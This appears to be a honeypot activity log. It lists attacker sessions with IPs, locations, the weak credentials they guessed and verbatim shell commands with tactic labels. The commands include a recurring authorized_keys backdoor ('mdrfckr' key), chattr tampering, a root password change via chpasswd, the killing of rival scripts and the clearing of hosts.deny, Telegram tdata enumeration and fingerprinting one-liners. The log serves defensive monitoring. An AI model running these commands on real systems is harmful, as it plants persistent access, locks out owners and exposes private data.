$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ feral_yankee_root (20.96.179.87) โ€” Boydton, United States ยท 1 session ยท 2 cmds
2026-07-01 03:13 EDT ยท as oracle/1qaz!QAZ
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ gnarled_pho_root (103.82.21.8) โ€” Dich Vong, Vietnam ยท 1 session ยท 2 cmds
2026-07-01 03:12 EDT ยท as oracle/password
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ unhinged_kebab_root (194.146.47.161) โ€” Bursa, Tรผrkiye ยท 1 session ยท 2 cmds
2026-07-01 03:11 EDT ยท as oracle/password
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ grumpy_windmill_root (34.178.21.247) โ€” Groningen, Netherlands ยท 48 sessions ยท 48 cmds
2026-06-22 02:49 EDT ยท as admin/123456, admin/admin, admin/password
echo (repeated echo 12x)
$ echo SHELL_TEST ร—48
๐ŸŽญ obsidian_merlion_root (8.219.95.97) โ€” Singapore, Singapore ยท 5 sessions ยท 5 cmds
2026-06-30 21:33 EDT ยท as admin/123456, oracle/oracle123, oracle/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—5
๐ŸŽญ derelict_fika_root (155.4.244.169) โ€” Lรคrbro, Sweden ยท 1 session ยท 2 cmds
2026-07-01 01:24 EDT ยท as oracle/Qq123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ manic_monsoon_root (135.235.138.43) โ€” Pune, India ยท 1 session ยท 2 cmds
2026-07-01 01:20 EDT ยท as oracle/Qq123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ restless_static_root (220.247.224.226) โ€” Meegoda, Sri Lanka ยท 1 session ยท 2 cmds
2026-07-01 01:15 EDT ยท as oracle/Qq123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ murky_ramen_root (111.238.174.6) โ€” Nukui, Japan ยท 1 session ยท 2 cmds
2026-07-01 01:12 EDT ยท as oracle/Qq123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ placid_dutch_root_61 (91.92.42.61) โ€” Amsterdam, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-30 23:53 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ frantic_volcano_root (175.103.54.172) โ€” Utan, Indonesia ยท 1 session ยท 2 cmds
2026-07-01 01:06 EDT ยท as oracle/Qq123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ aloof_drifter_root (91.92.40.239) โ€” Varna, Bulgaria ยท 31 sessions ยท 31 cmds
2026-06-30 23:30 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 5x across 5 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ jittery_junk_root (8.217.192.50) โ€” Hong Kong, Hong Kong ยท 16 sessions ยท 16 cmds
2026-06-17 09:27 EDT ยท as admin/123456, admin/admin, oracle/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—16
๐ŸŽญ feral_durian_root (47.237.12.112) โ€” Singapore, Singapore ยท 13 sessions ยท 13 cmds
2026-06-30 20:44 EDT ยท as admin/admin, admin/admin123, admin/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—13
๐ŸŽญ sneaky_peak_root (152.32.171.216) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-06-30 23:50 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ frantic_dragon_db (115.29.171.141) โ€” Hangzhou, China ยท 2 sessions ยท 2 cmds
2026-06-17 00:19 EDT ยท as postgres/postgres
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ rogue_bazaar_root (88.249.195.23) โ€” Istanbul, Tรผrkiye ยท 1 session ยท 2 cmds
2026-06-30 22:52 EDT ยท as oracle/1q2w3e4r
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rabid_cipher_root (91.92.40.10) โ€” Varna, Bulgaria ยท 39 sessions ยท 211 cmds
2026-06-18 02:06 EDT ยท as admin/123456, admin/admin, admin/admin123
export PATH manipulation โ†’ uname -s -v -n -m OS fingerprinting via /proc/version and /proc/uptime โ†’ discarded output redirection โ†’ no further reconnaissance or exploitation attempts
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—11
$ uname -s -v -n -m 2 > /dev/null ร—39
$ /bin/uname -s -v -n -m 2 > /dev/null ร—11
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—11
$ busybox uname -s -v -n -m 2 > /dev/null ร—11
$ ( [ -f /proc/version ] ร—11
$ [ -f /proc/version ] ร—11
$ head -1 /proc/version | cut -d -f1 ร—11
$ [ -f /etc/os-release ] ร—11
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—28
$ uname -m 2 > /dev/null ร—28
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—28
๐ŸŽญ wily_durian_root (8.222.143.123) โ€” Singapore, Singapore ยท 32 sessions ยท 32 cmds
2026-06-30 18:16 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ silent_wraith_root (190.112.222.22) โ€” San Pedro, Costa Rica ยท 1 session ยท 2 cmds
2026-06-30 19:51 EDT ยท as oracle/1qaz2wsx
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ zealous_eagle_root_167 (192.3.245.167) โ€” Los Angeles, United States ยท 1 session ยท 9 cmds
2026-06-30 18:32 EDT ยท as root/root
OS fingerprint via uname -a โ†’ hardware audit with ifconfig and cat /proc/cpuinfo โ†’ cryptomining scan via ps grep patterns โ†’ Telegram data enumeration targeting /home/*/.local/share/TelegramDesktop/tdata โ†’ failed hardware locate attempt for D877F783D5D3EF8Cs โ†’ benign echo command execution
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ restless_anatolia_root (94.154.43.181) โ€” Bursa, Turkey ยท 1 session ยท 1 cmd
2026-06-30 17:39 EDT ยท as root/root
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m
๐ŸŽญ rusty_echo_sol (195.178.110.30) โ€” Andorra la Vella, Andorra ยท 1328 sessions ยท 1328 cmds
2026-05-06 20:24 EDT ยท as sol/sol, solana/sol, solana/solana
Ran uname 3707x across 3707 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—1328
โ†ณ obfuscated system check
๐ŸŽญ nocturnal_silk_sol (111.228.13.226) โ€” Beijing, China ยท 1 session ยท 19 cmds
2026-06-30 14:42 EDT ยท as root/pass123
cd ~; chattr -ia .ssh; lockr -ia .ssh โ†’ cd ~ && rm -rf .ssh && mkdir .ssh โ†’ echo "root:r3gPxwndvOol"|chpasswd|bash โ†’ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh โ†’ cat /
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:r3gPxwndvOol"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ unhinged_eagle_root (92.118.39.77) โ€” Dallas, United States ยท 20 sessions ยท 100 cmds
2026-06-25 05:10 EDT ยท as admin/123456, admin/admin, admin/admin123
PATH manipulation via export โ†’ OS fingerprinting with uname -s -v -n -m โ†’ kernel version extraction from /proc/version โ†’ OS detection via /etc/os-release โ†’ uptime sampling from /proc/uptime
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—2
$ uname -s -v -n -m 2 > /dev/null ร—20
$ /bin/uname -s -v -n -m 2 > /dev/null ร—4
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—4
$ busybox uname -s -v -n -m 2 > /dev/null ร—4
$ ( [ -f /proc/version ] ร—4
$ [ -f /proc/version ] ร—4
$ head -1 /proc/version | cut -d -f1 ร—4
$ [ -f /etc/os-release ] ร—4
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output" ร—2
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo 